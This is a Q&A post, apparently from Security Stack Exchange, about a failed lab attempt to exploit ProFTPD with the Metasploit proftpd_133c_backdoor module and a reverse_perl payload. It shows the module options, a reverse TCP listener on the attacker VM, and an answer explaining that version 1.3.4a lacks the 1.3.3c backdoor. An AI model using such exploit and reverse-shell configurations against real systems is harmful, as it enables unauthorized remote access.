我想练习利用proftpd后门开发系统。我使用利用proftpd_133c_backdoor和有效载荷reverse_perl.I学习如何利用这个链接,https://www.youtube.com/watch?v=1Rp5_QysRpE&t=2s。
攻击者虚拟机是192.168.19.2。我的受害者虚拟机是192.168.19.5(proftpd 1.3.4a.)在受害者上打开的端口为21,版本号为proFTPD 1.3.4a
下面是利用漏洞和有效负载的配置。
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.19.5 yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.19.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic然后,我利用它,但它说不是后门。结果如下所示。
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.19.2:4444
[*] 192.168.19.5:21 - Sending Backdoor Command
[-] 192.168.19.5:21 - Not backdoored
[*] Exploit completed, but no session was created.实现这种利用的解决方案是什么?怎么做?请帮帮我。谢谢。
发布于 2018-04-30 06:33:22
我利用proftpd_133c_backdoor .
从文献资料您可以看到:
此模块利用添加到ProFTPD下载存档中的恶意后门进行攻击。这个后门出现在2010年11月28日至2010年12月2日的proftpd-1.3.3c.tar.Bz2\gz档案中。
但是,很明显,您使用的是不受此后门影响的proftpd版本:
我的受害者虚拟机..。方案1.3.4a
难怪它不起作用。事实上,它不起作用的是预期的行为。
https://security.stackexchange.com/questions/184878
复制相似问题